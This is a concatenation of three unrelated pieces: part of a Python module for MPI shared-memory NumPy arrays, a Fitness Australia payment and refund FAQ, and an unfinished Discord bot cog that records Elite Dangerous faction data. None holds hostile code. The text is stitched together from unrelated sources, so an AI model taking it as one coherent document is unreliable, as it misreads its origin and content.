empty_like - Create uninitialised array same size/shape as another array.
zeros - Create zero-initialised array.
zeros_like - Create zero-initialised array same size/shape as another array.
ones - Create one-initialised array.
ones_like - Create one-initialised array same size/shape as another array.
copy - Create a replica of a specified array.
Utilities
=========
.. autosummary::
:toctree: generated/
NdarrayMetaData - Strides, offset and order info.
"""
from __future__ import absolute_import
import sys as _sys
import numpy as _np
import mpi4py.MPI as _mpi
import array_split as _array_split
from array_split.split import convert_halo_to_array_form as _convert_halo_to_array_form
import collections as _collections
from .license import license as _license, copyright as _copyright, version as _version
from .comms import create_distribution, get_win_memory
from .distribution import LocaleExtent as _LocaleExtent
from .distribution import HaloSubExtent as _HaloSubExtent
from .distribution import IndexingExtent as _IndexingExtent
from .utils import log_shared_memory_alloc as _log_shared_memory_alloc
from .utils import log_memory_alloc as _log_memory_alloc
from . import logging as _logging
__author__ = "Shane J. Latham"
__license__ = _license()
__copyright__ = _copyright()
__version__ = _version()
class NdarrayMetaData(object):
"""
Encapsulates, strides, offset and order argument of :meth:`LndarrayProxy.__new__`.
"""
def __init__(self, offset, strides, order):
"""
Construct.
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer.
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
"""
object.__init__(self)
self._strides = strides
self._offset = offset
self._order = order
@property
def order(self):
return self._order
class win_lndarray(_np.ndarray):
"""
Sub-class of :obj:`numpy.ndarray` which allocates buffer using
MPI window allocated memory.
"""
def __new__(
cls,
shape,
dtype=_np.dtype("float64"),
buffer=None,
offset=0,
strides=None,
order=None,
comm=None,
root_rank=0
):
"""
Construct. Allocates shared-memory (:func:`mpi4py.MPI.Win.Allocated_shared`)
buffer when :samp:`{comm}.size > 1`. Uses :func:`mpi4py.MPI.Win.Allocate`
to allocate buffer when :samp:`{comm}.size == 1`.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Local** shape of the array, this parameter is ignored.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type for elements of the array.
:type buffer: :obj:`buffer`
:param buffer: The sequence of bytes providing array element storage.
Raises :obj:`ValueError` if :samp:`{buffer} is None`.
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer, i.e where array begins in buffer
(in buffer bytes).
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
:type comm: :obj:`mpi4py.Comm`
:param comm: Communicator used for allocating MPI window memory.
:type root_rank: :obj:`int`
:param root_rank: Rank of root process which allocates the shared memory.
"""
dtype = _np.dtype(dtype)
if comm is None:
raise ValueError("Got comm is None, require comm to be a valid mpi4py.MPI.Comm object")
if comm is _mpi.COMM_NULL:
raise ValueError(
"Got comm is COMM_NULL, require comm to be a valid mpi4py.MPI.Comm object"
)
if buffer is None:
num_rank_bytes = 0
rank_shape = shape
if comm.rank == root_rank:
num_rank_bytes = int(_np.product(rank_shape) * dtype.itemsize)
else:
rank_shape = tuple(_np.zeros_like(rank_shape))
logger = _logging.get_rank_logger(__name__ + "." + cls.__name__)
if (_mpi.VERSION >= 3) and (comm.size > 1):
_log_shared_memory_alloc(
logger.debug, "BEG: ", num_rank_bytes, rank_shape, dtype
)
win = \
_mpi.Win.Allocate_shared(
num_rank_bytes,
dtype.itemsize,
comm=comm
)
_log_shared_memory_alloc(
logger.debug, "END: ", num_rank_bytes, rank_shape, dtype
)
buf_isize_pair = win.Shared_query(0)
buffer = buf_isize_pair[0]
else:
_log_memory_alloc(
logger.debug, "BEG: ", num_rank_bytes, rank_shape, dtype
)
win = _mpi.Win.Allocate(num_rank_bytes, dtype.itemsize, comm=comm)
_log_memory_alloc(
logger.debug, "END: ", num_rank_bytes, rank_shape, dtype
)
buffer = get_win_memory(win)
buffer = _np.array(buffer, dtype='B', copy=False)
self = \
_np.ndarray.__new__(
cls,
shape,
dtype,
buffer,
offset,
strides,
order
)
self._comm = comm
self._win = win
return self
def __array_finalize__(self, obj):
"""
Sets :attr:`md` attribute for :samp:`{self}`
from :samp:`{obj}` if required.
:type obj: :obj:`object` or :samp:`None`
:param obj: Object from which attributes are set.
"""
if obj is None:
return
self._comm = getattr(obj, '_comm', None)
self._win = getattr(obj, '_win', None)
@property
def comm(self):
"""
The :obj:`mpi4py.MPI.Comm` communicator which was collectively used to allocate
the buffer (memory) for this array.
"""
return self._comm
@property
def win(self):
"""
The :obj:`mpi4py.MPI.Win` window which was created when allocating
the buffer (memory) for this array.
"""
return self._win
def free(self):
"""
Collective (over all processes in :attr:`comm`) free the MPI window
and associated memory buffer.
"""
self.shape = tuple(_np.zeros_like(self.shape))
if self._win is not None:
self._win.Free()
def __enter__(self):
"""
For use with :samp:`with` contexts.
"""
return self
def __exit__(self, type, value, traceback):
"""
For use with :samp:`with` contexts.
"""
self.free()
return False
class lndarray(_np.ndarray):
"""
Sub-class of :obj:`numpy.ndarray` which requires :samp:`{buffer}` to
be specified for instantiation.
"""
def __new__(
cls,
shape=None,
dtype=_np.dtype("float64"),
buffer=None,
offset=0,
strides=None,
order=None
):
"""
Construct, at least one of :samp:{shape} or :samp:`decomp` should
be specified (i.e. at least one should not be :samp:`None`).
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Local** shape of the array, this parameter is ignored.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type for elements of the array.
:type buffer: :obj:`buffer`
:param buffer: The sequence of bytes providing array element storage.
Raises :obj:`ValueError` if :samp:`{buffer} is None`.
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer, i.e where array begins in buffer
(in buffer bytes).
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
"""
if buffer is None:
raise ValueError("Got buffer=None, require buffer allocated from LocaleComms.")
self = \
_np.ndarray.__new__(
cls,
shape,
dtype,
buffer,
offset,
strides,
order
)
self._md = NdarrayMetaData(offset=offset, strides=strides, order=order)
return self
def __array_finalize__(self, obj):
"""
Sets :attr:`md` attribute for :samp:`{self}`
from :samp:`{obj}` if required.
:type obj: :obj:`object` or :samp:`None`
:param obj: Object from which attributes are set.
"""
if obj is None:
return
self._md = getattr(obj, '_md', None)
@property
def md(self):
"""
Meta-data object of type :obj:`NdarrayMetaData`.
"""
return self._md
def free(self):
"""
Release reference to buffer, and zero-ise :samp:`self.shape`.
"""
pass
PartitionViewSlices = \
_collections.namedtuple(
"PartitionViewSlices",
[
"rank_view_slice_n",
"rank_view_slice_h",
"rank_view_relative_slice_n",
"rank_view_partition_slice_h",
"lndarray_view_slice_n"
]
)
if (_sys.version_info[0] >= 3) and (_sys.version_info[1] >= 5):
PartitionViewSlices.__doc__ =\
"""
Stores multiple :obj:`tuple`-of-:obj:`slice` objects indicating
the slice (tile) of the :obj:`lndarray` on which a :samp:`intra_locale_comm`
rank MPI process operates.
"""
PartitionViewSlices.rank_view_slice_n.__doc__ =\
"""
Slice indicating tile of the non-halo array.
"""
PartitionViewSlices.rank_view_slice_h.__doc__ =\
"""
The slice :attr:`rank_view_slice_n` with halo added.
"""
PartitionViewSlices.rank_view_relative_slice_n.__doc__ =\
"""
*Relative* slice which can be used to remove the
halo elements from a view generated using :attr:`rank_view_slice_h`.
"""
PartitionViewSlices.rank_view_partition_slice_h.__doc__ =\
"""
Slice indicating tile of the halo array.
"""
PartitionViewSlices.lndarray_view_slice_n.__doc__ =\
"""
Slice for generating a view of a :obj:`lndarray` with
the halo removed.
"""
#: Cache for locale array partitioning
_intra_partition_cache = _collections.defaultdict(lambda: None)
class LndarrayProxy(object):
"""
Proxy for :obj:`lndarray` instances. Provides :samp:`peer_rank`
views of the array for parallelism.
"""
#: The "low index" indices.
LO = _LocaleExtent.LO
#: The "high index" indices.
HI = _LocaleExtent.HI
def __new__(
cls,
shape=None,
dtype=_np.dtype("float64"),
buffer=None,
offset=0,
strides=None,
order=None,
intra_locale_rank=None,
intra_locale_size=0,
intra_partition_dims=None,
locale_extent=None,
halo=None,
comms_and_distrib=None,
rma_window_buffer=None
):
"""
Initialise, at least one of :samp:{shape} or :samp:`locale_extent` should
be specified (i.e. at least one should not be :samp:`None`).
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: Shape of the array apportioned to this locale. If :samp:`None`
shape is taken as :samp:`{locale_extent}.shape_h`.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type for elements of the array.
:type buffer: :obj:`memoryview`
:param buffer: The sequence of bytes providing array element storage.
Must be specified (not :samp:`None`).
:type offset: :samp:`None` or :obj:`int`
:param offset: Offset of array data in buffer, i.e where array begins in buffer
(in buffer bytes).
:type strides: :samp:`None` or sequence of :obj:`int`
:param strides: Strides of data in memory.
:type order: {:samp:`C`, :samp:`F`} or :samp:`None`
:param order: Row-major (C-style) or column-major (Fortran-style) order.
:type locale_extent: :obj:`mpi_array.distribution.LocaleExtent`
:param locale_extent: The array extent to be allocated on this locale.
"""
self = object.__new__(cls)
# initialise these members before potential exceptions
# because they are referenced in self.free (via self.__del__).
self._lndarray = None
self.rma_window_buffer = None
if locale_extent is None or (not isinstance(locale_extent, _LocaleExtent)):
raise ValueError(
"Got locale_extent=%s, expecting instance of type %s"
%
(locale_extent, _LocaleExtent)
)
if (shape is not None) and (not _np.all(locale_extent.shape_h == shape)):
raise ValueError(
"Got conflicting locale shape: shape=%s, locale_extent.shape_n=%s"
%
(shape, locale_extent.shape_h)
)
self._lndarray = \
lndarray(
shape=locale_extent.shape_h,
dtype=dtype,
buffer=buffer,
offset=offset,
strides=strides,
order=order
)
self._intra_locale_rank = intra_locale_rank
self._intra_locale_size = intra_locale_size
self._intra_partition_dims = intra_partition_dims
self._locale_extent = locale_extent
self._halo = _convert_halo_to_array_form(halo, self._locale_extent.ndim)
self._intra_partition_dims = _np.zeros_like(locale_extent.shape_h)
self._intra_partition_dims, self._intra_partition = \
self.calculate_intra_partition(
intra_locale_size=self._intra_locale_size,
intra_locale_dims=self._intra_partition_dims,
intra_locale_rank=self._intra_locale_rank,
extent=self._locale_extent,
halo=self._halo
)
self.comms_and_distrib = comms_and_distrib
self.rma_window_buffer = rma_window_buffer
return self
def free(self):
"""
Release locale array memory and assign :samp:`None` to self attributes.
"""
if self._lndarray is not None:
self._lndarray.free()
self._lndarray = None
self._intra_locale_rank = None
self._intra_locale_size = None
self._intra_partition_dims = None
self._locale_extent = None
self._halo = None
self._intra_partition_dims = None
self._intra_partition = None
self.comms_and_distrib = None
if self.rma_window_buffer is not None:
self.rma_window_buffer.free()
self.rma_window_buffer = None
def __del__(self):
"""
Calls :meth:`free`.
"""
self.free()
def __enter__(self):
"""
For use with :samp:`with` contexts.
"""
return self
def __exit__(self, type, value, traceback):
"""
For use with :samp:`with` contexts.
"""
self.free()
return False
def calculate_intra_partition(
self,
intra_locale_size,
intra_locale_dims,
intra_locale_rank,
extent,
halo
):
"""
Splits :samp:`{extent}` into :samp:`self.intra_locale_size` number
of tiles.
"""
global _intra_partition_cache
key = \
(
intra_locale_size,
tuple(intra_locale_dims),
intra_locale_rank,
extent.to_tuple(),
tuple(tuple(row) for row in halo.tolist())
)
partition_pair = _intra_partition_cache[key]
if partition_pair is None:
ndim = extent.ndim
rank_view_slice_n = tuple()
rank_view_slice_h = rank_view_slice_n
rank_view_relative_slice_n = rank_view_slice_n
rank_view_partition_h = rank_view_slice_n
lndarray_view_slice_n = rank_view_slice_n
if ndim > 0:
intra_locale_dims = \
_array_split.split.calculate_num_slices_per_axis(
intra_locale_dims,
intra_locale_size
)
if extent.size_n > 0:
shape_splitter = \
_array_split.ShapeSplitter(
array_shape=extent.shape_n,
axis=intra_locale_dims,
halo=0,
array_start=extent.start_n
)
split = shape_splitter.calculate_split()
rank_extent = \
_HaloSubExtent(
globale_extent=extent,
slice=split.flatten()[intra_locale_rank],
halo=halo
)
# Convert rank_extent_n and rank_extent_h from global-indices
# to local-indices
rank_extent = extent.globale_to_locale_extent_h(rank_extent)
rank_h_relative_extent_n = \
_IndexingExtent(
start=rank_extent.start_n - rank_extent.start_h,
stop=rank_extent.start_n - rank_extent.start_h + rank_extent.shape_n,
)
rank_view_slice_n = rank_extent.to_slice_n()
rank_view_slice_h = rank_extent.to_slice_h()
rank_view_relative_slice_n = rank_h_relative_extent_n.to_slice()
rank_view_partition_h = rank_view_slice_n
if _np.any(extent.halo > 0):
shape_splitter = \
_array_split.ShapeSplitter(
array_shape=extent.shape_h,
axis=intra_locale_dims,
halo=0,
)
split = shape_splitter.calculate_split()
rank_view_partition_h = split.flatten()[intra_locale_rank]
lndarray_view_slice_n = extent.globale_to_locale_extent_h(extent).to_slice_n()
partition_pair = \
(
intra_locale_dims,
PartitionViewSlices(
rank_view_slice_n,
rank_view_slice_h,
rank_view_relative_slice_n,
rank_view_partition_h,
lndarray_view_slice_n
)
)
_intra_partition_cache[key] = partition_pair
return partition_pair
def __getitem__(self, *args, **kwargs):
"""
Return slice/item from :attr:`lndarray` array.
"""
return self._lndarray.__getitem__(*args, **kwargs)
def __setitem__(self, *args, **kwargs):
"""
Set slice/item in :attr:`lndarray` array.
"""
self._lndarray.__setitem__(*args, **kwargs)
def __eq__(self, other):
"""
"""
if isinstance(other, LndarrayProxy):
return self._lndarray == other._lndarray
else:
return self._lndarray == other
@property
def lndarray(self):
"""
An :obj:`lndarray` instance containing array data in (potentially)
shared memory.
"""
return self._lndarray
@property
def intra_partition(self):
"""
A :obj:`PartitionViewSlices` containing slices for this rank (of :samp:`peer_comm`).
"""
return self._intra_partition
@property
def intra_partition_dims(self):
"""
A sequence of integers indicating the number of partitions
along each axis which determines the per-rank views of the locale extent array.
"""
return self._intra_partition_dims
@property
def locale_extent(self):
"""
A :obj:`LocaleExtent` describing the portion of the array assigned to this locale.
"""
return self._locale_extent
@property
def halo(self):
"""
The number of ghost cells for intra locale partitioning of the extent.
This is an upper bound on the per-rank partitions, with the halo possibly
trimmed by the halo extent (due to being on globale boundary).
"""
return self._halo
@property
def md(self):
"""
Meta-data object of type :obj:`NdarrayMetaData`.
"""
return self._lndarray.md
@property
def dtype(self):
"""
A :obj:`numpy.dtype` object describing the element type of this array.
"""
return self._lndarray.dtype
@property
def shape(self):
"""
The shape of the locale array (including halo), i.e. :samp:`self.lndarray.shape`.
"""
return self._lndarray.shape
@property
def rank_view_n(self):
"""
A tile view of the array for this rank of :samp:`peer_comm`.
"""
return self._lndarray[self._intra_partition.rank_view_slice_n]
@property
def rank_view_h(self):
"""
A tile view (including halo elements) of the array for this rank of :samp:`peer_comm`.
"""
return self._lndarray[self._intra_partition.rank_view_slice_h]
@property
def rank_view_slice_n(self):
"""
Sequence of :obj:`slice` objects used to generate :attr:`rank_view_n`.
"""
return self._intra_partition.rank_view_slice_n
@property
def rank_view_slice_h(self):
"""
Sequence of :obj:`slice` objects used to generate :attr:`rank_view_h`.
"""
return self._intra_partition.rank_view_slice_h
@property
def rank_view_partition_h(self):
"""
Rank tile view from the paritioning of entire :samp:`self._lndarray`
(i.e. partition of halo array). Same as :samp:`self.rank_view_n` when
halo is zero.
"""
return self._lndarray[self._intra_partition.rank_view_partition_slice_h]
@property
def view_n(self):
"""
View of entire array without halo.
"""
return self._lndarray[self._intra_partition.lndarray_view_slice_n]
@property
def view_h(self):
"""
The entire :obj:`LndarrayProxy` view including halo (i.e. :samp:{self}).
"""
return self._lndarray.view()
def fill(self, value):
"""
Fill the array with a scalar value (excludes ghost elements).
:type value: scalar
:param value: All non-ghost elements are assigned this value.
"""
self._lndarray[self._intra_partition.rank_view_slice_n].fill(value)
def fill_h(self, value):
"""
Fill the array with a scalar value (including ghost elements).
:type value: scalar
:param value: All elements (including ghost elements) are assigned this value.
"""
self._lndarray[self._intra_partition.rank_view_partition_slice_h].fill(value)
def empty(
shape=None,
dtype="float64",
comms_and_distrib=None,
order='C',
return_rma_window_buffer=False,
intra_partition_dims=None,
**kwargs
):
"""
Creates array of uninitialised elements.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Global** shape to be distributed amongst
memory nodes.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type of array elements.
:type comms_and_distrib: :obj:`numpy.dtype`
:param comms_and_distrib: Data type of array elements.
:rtype: :obj:`LndarrayProxy`
:return: Newly created array with uninitialised elements.
"""
if comms_and_distrib is None:
comms_and_distrib = create_distribution(shape=shape, **kwargs)
intra_locale_rank = comms_and_distrib.locale_comms.intra_locale_comm.rank
intra_locale_size = comms_and_distrib.locale_comms.intra_locale_comm.size
locale_extent = \
comms_and_distrib.distribution.get_extent_for_rank(
inter_locale_rank=comms_and_distrib.this_locale.inter_locale_rank
)
rma_window_buffer = \
comms_and_distrib.locale_comms.alloc_locale_buffer(
shape=locale_extent.shape_h,
dtype=dtype
)
kwargs = dict()
if not return_rma_window_buffer:
kwargs = {
"comms_and_distrib": comms_and_distrib,
"rma_window_buffer": rma_window_buffer,
}
ret = \
LndarrayProxy(
shape=rma_window_buffer.shape,
buffer=rma_window_buffer.buffer,
dtype=dtype,
order=order,
intra_locale_rank=intra_locale_rank,
intra_locale_size=intra_locale_size,
intra_partition_dims=intra_partition_dims,
locale_extent=locale_extent,
halo=comms_and_distrib.distribution.halo,
**kwargs
)
if return_rma_window_buffer:
ret = ret, rma_window_buffer
return ret
def empty_like(ary, dtype=None):
"""
Return a new array with the same shape and type as a given array.
:type ary: :obj:`numpy.ndarray`
:param ary: Copy attributes from this array.
:type dtype: :obj:`numpy.dtype`
:param dtype: Specifies different dtype for the returned array.
:rtype: :samp:`type(ary)`
:return: Array of uninitialized (arbitrary) data with the same shape and type as :samp:`{a}`.
"""
if dtype is None:
dtype = ary.dtype
if (isinstance(ary, LndarrayProxy)):
ret_ary = \
empty(
dtype=ary.dtype,
comms_and_distrib=ary.comms_and_distrib,
order=ary.md.order,
intra_partition_dims=ary.intra_partition_dims
)
else:
ret_ary = _np.empty_like(ary, dtype=dtype)
return ret_ary
def zeros(shape=None, dtype="float64", comms_and_distrib=None, order='C', **kwargs):
"""
Creates array of zero-initialised elements.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Global** shape to be distributed amongst
memory nodes.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type of array elements.
:type comms_and_distrib: :obj:`numpy.dtype`
:param comms_and_distrib: Data type of array elements.
:rtype: :obj:`LndarrayProxy`
:return: Newly created array with zero-initialised elements.
"""
ary = empty(shape, dtype=dtype, comms_and_distrib=comms_and_distrib, order=order, **kwargs)
ary.fill_h(ary.dtype.type(0))
return ary
def zeros_like(ary, *args, **kwargs):
"""
Return a new zero-initialised array with the same shape and type as a given array.
:type ary: :obj:`LndarrayProxy`
:param ary: Copy attributes from this array.
:type dtype: :obj:`numpy.dtype`
:param dtype: Specifies different dtype for the returned array.
:rtype: :obj:`LndarrayProxy`
:return: Array of zero-initialized data with the same shape and type as :samp:`{ary}`.
"""
ary = empty_like(ary, *args, **kwargs)
ary.fill_h(ary.dtype.type(0))
return ary
def ones(shape=None, dtype="float64", comms_and_distrib=None, order='C', **kwargs):
"""
Creates array of one-initialised elements.
:type shape: :samp:`None` or sequence of :obj:`int`
:param shape: **Global** shape to be distributed amongst
memory nodes.
:type dtype: :obj:`numpy.dtype`
:param dtype: Data type of array elements.
:type comms_and_distrib: :obj:`numpy.dtype`
:param comms_and_distrib: Data type of array elements.
:rtype: :obj:`LndarrayProxy`
:return: Newly created array with one-initialised elements.
"""
ary = empty(shape, dtype=dtype, comms_and_distrib=comms_and_distrib, order=order, **kwargs)
ary.fill_h(ary.dtype.type(1))
return ary
def ones_like(ary, *args, **kwargs):
"""
Return a new one-initialised array with the same shape and type as a given array.
:type ary: :obj:`LndarrayProxy`
:param ary: Copy attributes from this array.
:type dtype: :obj:`numpy.dtype`
:param dtype: Specifies different dtype for the returned array.
:rtype: :obj:`LndarrayProxy`
:return: Array of one-initialized data with the same shape and type as :samp:`{ary}`.
"""
ary = empty_like(ary, *args, **kwargs)
ary.fill_h(ary.dtype.type(1))
return ary
def copy(ary):
"""
Return an array copy of the given object.
:type ary: :obj:`LndarrayProxy`
:param ary: Array to copy.
:rtype: :obj:`LndarrayProxy`
:return: A copy of :samp:`ary`.
"""
ary_out = empty_like(ary)
ary_out.rank_view_n[...] = ary.rank_view_n[...]
return ary_out
__all__ = [s for s in dir() if not s.startswith('_')]
|
Online transactions: Fill in your details and Fitness Australia will charge the transaction to your account.
Mail - send the completed form with payment (with your credit card details OR cheque OR Australian money order) to Fitness Australia on the below address.
Fax - fax the completed form with payment (credit card details - cheque and Australian money orders cannot be processed via fax) to 1300 734 613.
2. I have an issue with payment, who can I speak to?
It is important to Fitness Australia that all clients understand their rights and obligations in relation to refunds.
Fitness Australia Exercise Professional & Business Registration is a non-refundable fee.
Should you believe that your circumstances for a refund requires special consideration, please make an application in writing to the Manager, Industry Services via email to [email protected], fax to 1300 734 613 or via mail to PO Box 6453, Alexandria 2015.
Should a refund be granted a $55.00 (inc GST) Administration Fee will apply.
NOTE: If your refund request is approved you will be required to send in your original registration documents before your refund can be processed.
4. When will you debit/charge my account?
Payment is debited once the application has been submitted. We usually take about one week to process applications.
You will receive a tax receipt, issued by Fitness Australia Limited, (ABN: 51 131 422 403), on receipt of payment.
5. I’m due to renew my Fitness Business registration, when can I do this?
Registration is for one year commencing on the date your application is accepted and is renewable on the anniversary of the date for a subsequent year.
All registration fees must be paid annually in advance. |
from datetime import datetime
import discord
from discord.ext import commands
import asyncio
import checks
import database
from dateutil.parser import isoparse
from config import BGS_CHANNEL
from data.faction import Faction
from web import Web
class BGS(commands.Cog):
def __init__(self, bot: commands.Bot):
self.bot = bot
self.system_cache = {}
self.faction_cache = {}
self.updated_systems = set()
self.last_tick = None
self.tick_id = 0
self.faction_data = {
75253: Faction(75253, "Colonists of Aurora", "https://inara.cz/minorfaction/44432/"),
23831: Faction(23831, "Prismatic Imperium", "https://inara.cz/minorfaction/25441/"),
74847: Faction(74847, "Adamantine Union", "https://inara.cz/minorfaction/35809/")
}
self.war_cache = {}
# @commands.command(name='fullscan', case_insensitive=True, hidden=True)
# @commands.check(checks.can_manage_bot)
async def _full_scan(self, ctx, *, faction_name):
async with ctx.typing():
await self._fullscan_faction(faction_name, 1)
await ctx.send("done")
async def _fullscan_faction(self, faction_name, page):
args = {
'factionname': faction_name,
'page': page
}
data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems', args, 'object')
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
tick_select = "SELECT id as tick_id, time FROM tick ORDER BY time DESC LIMIT 1"
self.tick_id = (await db.fetchrow(tick_select))['tick_id']
for system in data.docs:
if str(system.id) not in self.system_cache:
self.system_cache[str(system.id)] = system.name
insert_system = "INSERT INTO star_system VALUES ($1, $2, $3, $4 , $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15) ON CONFLICT DO NOTHING "
if str(system.controlling_minor_faction_id) in self.faction_cache:
controling_faction_name = self.faction_cache[str(system.controlling_minor_faction_id)]
else:
controling_faction_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions', {'eddbid': system.controlling_minor_faction_id}, 'object')
controling_faction_name = controling_faction_data.docs[0].name
self.faction_cache[str(system.controlling_minor_faction_id)] = controling_faction_name
our_faction = 0
for faction in system.minor_faction_presences:
if faction.minor_faction_id in self.faction_data:
our_faction = faction.minor_faction_id
system_values = (
system.id,
system.name,
system.x,
system.y,
system.z,
controling_faction_name,
system.needs_permit,
system.power,
system.power_state,
system.reserve_type,
system.primary_economy,
system.security,
system.population,
system.edsm_id,
our_faction
)
await db.execute(insert_system, *system_values)
for faction in system.minor_faction_presences:
await self._process_faction_data(faction.minor_faction_id)
states = ""
pending = ""
recovering = ""
for state in faction.active_states:
if len(states) > 0:
states = states + '|'
states = states + state.name
for state in faction.pending_states:
if len(pending) > 0:
pending = pending + '|'
pending = pending + state.name
for state in faction.recovering_states:
if len(recovering) > 0:
recovering = recovering + '|'
recovering = recovering + state.name
async with db.transaction():
insert_influence = "INSERT INTO influence(faction, system, influence, tick, states, pending, recovering) VALUES($1, $2, $3, $4, $5, $6, $7) ON CONFLICT DO NOTHING"
influence_values = (
faction.minor_faction_id,
system.id,
faction.influence,
self.tick_id,
states,
pending,
recovering
)
await db.execute(insert_influence, *influence_values)
await database.Database.close_connection(db)
if int(data.page) < int(data.pages):
await self._fullscan_faction(faction_name, page + 1)
async def _process_faction_data(self, faction_id):
args = {
'eddbid': faction_id
}
data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions', args, 'object')
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
for faction in data.docs:
if str(faction_id) not in self.faction_cache:
self.faction_cache[str(faction.id)] = faction.name
insert_faction = "INSERT INTO faction VALUES ($1, $2, $3, $4, $5, $6) ON CONFLICT DO NOTHING "
if faction.home_system_id is not None:
if str(faction.home_system_id) in self.system_cache:
system_name = self.system_cache[str(faction.home_system_id)]
else:
home_system_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems', {'eddbid': faction.home_system_id}, 'object')
system_name = home_system_data.docs[0].name
self.system_cache[str(faction.home_system_id)] = system_name
else:
system_name = ""
faction_values = (
faction.id,
faction.name,
faction.is_player_faction,
system_name,
faction.allegiance,
faction.government
)
await db.execute(insert_faction, *faction_values)
await database.Database.close_connection(db)
async def _get_system_id(self, system_name):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_result = await db.fetchrow("SELECT id FROM star_system where name = $1", system_name)
if system_result is None:
home_system_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/populatedsystems',
{'name': system_name}, 'object')
for system in home_system_data.docs:
if str(system.id) not in self.system_cache:
self.system_cache[str(system.id)] = system.name
insert_system = "INSERT INTO star_system VALUES ($1, $2, $3, $4 , $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15) ON CONFLICT DO NOTHING "
if str(system.controlling_minor_faction_id) in self.faction_cache:
controling_faction_name = self.faction_cache[str(system.controlling_minor_faction_id)]
else:
controling_faction_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions',
{'eddbid': system.controlling_minor_faction_id},
'object')
controling_faction_name = controling_faction_data.docs[0].name
self.faction_cache[str(system.controlling_minor_faction_id)] = controling_faction_name
our_faction = 0
for faction in system.minor_faction_presences:
if faction.minor_faction_id in self.faction_data:
our_faction = faction.minor_faction_id
system_values = (
system.id,
system.name,
system.x,
system.y,
system.z,
controling_faction_name,
system.needs_permit,
system.power,
system.power_state,
system.reserve_type,
system.primary_economy,
system.security,
system.population,
system.edsm_id,
our_faction
)
system_id = system.id
await db.execute(insert_system, *system_values)
else:
system_id = system_result['id']
await database.Database.close_connection(db)
return system_id
async def _get_faction_id(self, faction_name):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
faction_result = await db.fetchrow("SELECT id FROM faction where name = $1", faction_name)
if faction_result is None:
faction_data = await Web.get_response('https://eddbapi.kodeblox.com/api/v4/factions',
{'name': faction_name}, 'object')
for faction in faction_data.docs:
if str(faction.id) not in self.faction_cache:
self.faction_cache[str(faction.id)] = faction.name
insert_faction = "INSERT INTO faction VALUES ($1, $2, $3, $4, $5, $6) ON CONFLICT DO NOTHING "
if faction.home_system_id is not None:
if str(faction.home_system_id) in self.system_cache:
system_name = self.system_cache[str(faction.home_system_id)]
else:
faction_data = await Web.get_response(
'https://eddbapi.kodeblox.com/api/v4/populatedsystems',
{'eddbid': faction.home_system_id}, 'object')
system_name = faction_data.docs[0].name
self.system_cache[str(faction.home_system_id)] = system_name
else:
system_name = ""
faction_values = (
faction.id,
faction.name,
faction.is_player_faction,
system_name,
faction.allegiance,
faction.government
)
faction_id = faction.id
await db.execute(insert_faction, *faction_values)
else:
faction_id = faction_result['id']
await database.Database.close_connection(db)
return faction_id
async def set_tick_date(self, date):
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
if self.last_tick is None or self.last_tick < date:
insert_tick = "INSERT INTO tick(time) values($1) ON CONFLICT DO NOTHING"
await db.execute(insert_tick, date)
self.updated_systems = set()
self.war_cache = {}
self.faction_data = {
75253: Faction(75253, "Colonists of Aurora", "https://inara.cz/minorfaction/44432/"),
23831: Faction(23831, "Prismatic Imperium", "https://inara.cz/minorfaction/25441/"),
74847: Faction(74847, "Adamantine Union", "https://inara.cz/minorfaction/35809/")
}
self.last_tick = date
tick_select = "SELECT id as tick_id, time FROM tick ORDER BY time DESC LIMIT 1"
self.tick_id = (await db.fetchrow(tick_select))['tick_id']
channel = self.bot.get_channel(BGS_CHANNEL)
# await self.recheck_systems() FIXME - EDDN API is currently not updating
self.faction_data[75253].message = await self.setup_bgs_message(channel, 75253) # Colonists of Aurora
self.faction_data[23831].message = await self.setup_bgs_message(channel, 23831) # Prismatic Imperium
self.faction_data[74847].message = await self.setup_bgs_message(channel, 74847) # Adamantine Union
update_faction = "UPDATE faction SET message_id = $1 WHERE id = $2"
await db.execute(update_faction, *(self.faction_data[75253].message, 75253))
await db.execute(update_faction, *(self.faction_data[23831].message, 23831))
await db.execute(update_faction, *(self.faction_data[74847].message, 74847))
await database.Database.close_connection(db)
async def setup_bgs_message(self, channel, faction_id):
embed = discord.Embed(colour=discord.Colour(0x992d22), url=self.faction_data[faction_id].link, title=self.faction_data[faction_id].name.upper())
embed.set_author(name="Tick at {:%d %b %Y %H:%M}".format(self.last_tick))
db = await database.Database.get_connection(self.bot.loop)
async with db.transaction():
system_select = "select id as system_id, name from star_system where our_faction_id = $1 order by name"
system_count = 0
